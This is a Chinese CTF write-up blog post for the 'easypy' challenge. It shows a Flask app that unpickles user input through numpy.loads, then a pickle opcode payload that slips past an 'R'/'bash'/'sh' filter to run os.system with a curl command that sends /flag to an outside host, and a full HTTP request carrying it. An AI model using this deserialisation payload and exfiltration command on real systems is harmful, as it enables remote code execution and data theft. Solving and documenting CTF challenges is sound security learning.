CTF—easypy

I’m not 程序圆

于 2023-06-26 16:41:59 发布

阅读量331

点赞数

文章标签： python flask 开发语言

本文链接：https://blog.csdn.net/m0_69773707/article/details/131400493

版权

import numpy, base64from flask import Flask, Response, requestapp = Flask(__name__)
@app.route('/', methods=['GET', 'POST'])def index():    return '小p想要找一个女朋友，你能帮他找找看么？'

@app.route('/girlfriends', methods=['GET', 'POST'])def girlfriends():    if request.values.get('data'):        data = request.values.get('data')        numpydata = base64.b64decode(data)        if b'R' in numpydata or b'bash' in numpydata or b'sh' in numpydata:            return '不能走捷径啊'        resp = numpy.loads(numpydata)        return '可以的，要的就是一种感觉'    return '有进步了,但是不多'

@app.route('/download', methods=['GET', 'POST'])def download():    with open('www.zip', 'rb') as (f):        stream = f.read()    response = Response(stream, content_type='application/octet-stream')    response.headers['Content-disposition'] = 'attachment;filename=www.zip'    return response

if __name__ == '__main__':    app.run(host='0.0.0.0', port=80)# okay decompiling .app.cpython-38.pyc

phpstudy漏洞修改admin密码

勾选系统权限，查看文件并下载flag

easypy

扫目录，有download路由，下载源码

import numpy, base64from flask import Flask, Response, requestapp = Flask(__name__)
@app.route('/', methods=['GET', 'POST'])def index():    return '小p想要找一个女朋友，你能帮他找找看么？'

@app.route('/girlfriends', methods=['GET', 'POST'])def girlfriends():    if request.values.get('data'):        data = request.values.get('data')        numpydata = base64.b64decode(data)        if b'R' in numpydata or b'bash' in numpydata or b'sh' in numpydata:            return '不能走捷径啊'        resp = numpy.loads(numpydata)        return '可以的，要的就是一种感觉'    return '有进步了,但是不多'

@app.route('/download', methods=['GET', 'POST'])def download():    with open('www.zip', 'rb') as (f):        stream = f.read()    response = Response(stream, content_type='application/octet-stream')    response.headers['Content-disposition'] = 'attachment;filename=www.zip'    return response

if __name__ == '__main__':    app.run(host='0.0.0.0', port=80)# okay decompiling .app.cpython-38.pyc

过滤了r和反弹shell直接外带

import numpy
import pickleimport base64import osopcode=b'''c__builtin__mapp0 0(S'curl xxx:5555/`cat /flag`'tp10(cossystemg1tp20g0g2x81p30c__builtin__tuplep4(g3tx81.'''
code=base64.b64encode(opcode)print(code)# pickle.loads(base64.b64decode(code))numpydata = base64.b64decode(code)if b'R' in numpydata or b'bash' in numpydata or b'sh' in numpydata:    print('不能走捷径啊')else:    resp = numpy.loads(numpydata)    print("ok")POST /girlfriends HTTP/1.1Host: eci-2ze5mdaorvazf0lpit4y.cloudeci1.ichunqiu.comUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/113.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeCookie: chkphone=acWxNpxhQpDiAchhNuSnEqyiQuDIO0O0OUpgrade-Insecure-Requests: 1X-Forwarded-For: 127.0.0.1X-Originating-IP: 127.0.0.1X-Remote-IP: 127.0.0.1X-Remote-Addr: 127.0.0.1X-Requested-With: XMLHttpRequestContent-Type: application/x-www-form-urlencodedContent-Length: 177
data=Y19fYnVpbHRpbl9fCm1hcApwMAowKFMnY3VybCAxMjQuNzAuMjA2LjIzODo1NTU1L2BjYXQgL2ZsYWdgJwp0cDEKMChjb3MKc3lzdGVtCmcxCnRwMgowZzAKZzIKgXAzCjBjX19idWlsdGluX18KdHVwbGUKcDQKKGczCnSBLg==